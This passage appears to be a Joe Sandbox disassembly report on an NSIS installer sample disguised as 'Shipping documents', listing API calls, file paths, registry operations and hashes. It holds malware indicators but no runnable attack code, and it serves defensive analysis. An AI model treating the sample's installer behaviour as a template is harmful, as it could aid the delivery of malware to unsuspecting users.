                                        • Opcode Fuzzy Hash: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                        • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

                                        Control-flow Graph

                                        control_flow_graph 766 401774-401799 call 402dab call 405e9d 771 4017a3-4017b5 call 406557 call 405e26 lstrcatW 766->771 772 40179b-4017a1 call 406557 766->772 778 4017ba-4017bb call 406805 771->778 772->778 781 4017c0-4017c4 778->781 782 4017c6-4017d0 call 4068b4 781->782 783 4017f7-4017fa 781->783 790 4017e2-4017f4 782->790 791 4017d2-4017e0 CompareFileTime 782->791 785 401802-40181e call 406047 783->785 786 4017fc-4017fd call 406022 783->786 793 401820-401823 785->793 794 401892-4018bb call 4055dc call 4032b9 785->794 786->785 790->783 791->790 795 401874-40187e call 4055dc 793->795 796 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 793->796 808 4018c3-4018cf SetFileTime 794->808 809 4018bd-4018c1 794->809 806 401887-40188d 795->806 796->781 829 401869-40186a 796->829 810 402c38 806->810 812 4018d5-4018e0 CloseHandle 808->812 809->808 809->812 816 402c3a-402c3e 810->816 814 4018e6-4018e9 812->814 815 402c2f-402c32 812->815 818 4018eb-4018fc call 406594 lstrcatW 814->818 819 4018fe-401901 call 406594 814->819 815->810 823 401906-4023a7 call 405bb7 818->823 819->823 823->815 823->816 829->806 831 40186c-40186d 829->831 831->795
                                        APIs
                                        • lstrcatW.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform\Baroco,?,?,00000031), ref: 004017B5
                                        • CompareFileTime.KERNEL32(-00000014,?,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform\Baroco,?,?,00000031), ref: 004017DA
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp$C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll$C:\Users\user\AppData\Local\acneform\Baroco$Exec
                                        • API String ID: 1941528284-4042721782

                                         Control-flow Graph (rendered graph not reproduced; basic blocks 4055dc-4056ac; legend: Executed / Not Executed)
                                        APIs
                                        • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                        • lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                        • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0), ref: 00405637
                                        • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 00405649
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll
                                        • API String ID: 2531174081-4233364125

                                         Control-flow Graph (rendered graph not reproduced; basic blocks 4068db-406948; legend: Executed / Not Executed)
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                        • wsprintfW.USER32 ref: 0040692D
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME
                                        • API String ID: 2200240437-1106614640

                                         Control-flow Graph (rendered graph not reproduced; basic blocks 402eae-402f95; legend: Executed / Not Executed)
                                        APIs
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0

                                         Control-flow Graph (rendered graph not reproduced; basic blocks 401c48-401d14 and 402c2f-402c3e; legend: Executed / Not Executed)
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971

                                         Control-flow Graph (rendered graph not reproduced; basic blocks 40248f-402608, 402933-40293a and 402c2f-402c3e; legend: Executed / Not Executed)
                                        APIs
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000023,00000011,00000002), ref: 004024DA
                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,00000011,00000002), ref: 0040251A
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,00000011,00000002), ref: 00402602
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp
                                        • API String ID: 2655323295-3576001853
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00406094
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-1857211195
                                        APIs
                                          • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405EDF
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                          • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\acneform\Baroco,?,00000000,000000F0), ref: 00401652
                                        Strings
                                        • C:\Users\user\AppData\Local\acneform\Baroco, xrefs: 00401645
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\acneform\Baroco
                                        • API String ID: 1892508949-727163374
                                        APIs
                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Exec,?,00000000,00406696,80000002), ref: 0040646B
                                        • RegCloseKey.KERNELBASE(?), ref: 00406476
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Exec
                                        • API String ID: 3356406503-459137531
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 334405425-0
                                        • Opcode ID: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                        • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                        • Opcode Fuzzy Hash: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                        • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID: Exec
                                        • API String ID: 3394109436-459137531
                                        • Opcode ID: fb5b9ebeaad3a79f54b281eda5c862824b880451e65e455491233296c99b22fc
                                        • Instruction ID: 52bd34c5afe528d1e7f7705a0b64ffdd7bdb14472fd10e075fda9825736fe234
                                        • Opcode Fuzzy Hash: fb5b9ebeaad3a79f54b281eda5c862824b880451e65e455491233296c99b22fc
                                        • Instruction Fuzzy Hash: B221F972900254E7D720BF98DD89E5E73B5AB04718711093FF552B76C0D7B8AC019B9D
                                        APIs
                                          • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                          • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                        • lstrlenW.KERNEL32 ref: 00402344
                                        • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                        • String ID:
                                        • API String ID: 1486964399-0
                                        • Opcode ID: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                        • Instruction ID: 885267ae01076befc9d2550e8446c8d72b56611081dd9eb5b5e506e95b58587e
                                        • Opcode Fuzzy Hash: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                        • Instruction Fuzzy Hash: 04117071900318AADB10EFB9D90AA9EB6F8AF14354F20543FA401F72D1DBB88941CB59
                                        APIs
                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,00000011,00000002), ref: 00402602
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Enum$CloseValue
                                        • String ID:
                                        • API String ID: 397863658-0
                                        • Opcode ID: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                        • Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
                                        • Opcode Fuzzy Hash: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                        • Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D
                                        APIs
                                          • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                          • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                        • GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402045
                                        • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402064
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                        • String ID:
                                        • API String ID: 2520467145-0
                                        • Opcode ID: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                        • Instruction ID: 763ad8e8b63f2924b10e93d9a85bf0a11dc22f08f43b137c8aa05ca7cc66be5b
                                        • Opcode Fuzzy Hash: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                        • Instruction Fuzzy Hash: E7213871900208AFDB11DFE5C985EEEBBB4EF08354F11402AFA05B62D0D7759E51DB64
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                        • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                        • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                        • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                        APIs
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue
                                        • String ID:
                                        • API String ID: 2831762973-0
                                        • Opcode ID: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                        • Instruction ID: 0b96b132e490ce7cd6ce1444893b6524bba18796501a832965f154b7c78b6e42
                                        • Opcode Fuzzy Hash: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                        • Instruction Fuzzy Hash: 82F06832A04510ABDB00BBA89A4D9EE62A5AF54314F11443FE502B71C1CAFC5D02966D
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                        • GetLastError.KERNEL32 ref: 00405AFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                        • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                        • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                        • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                        APIs
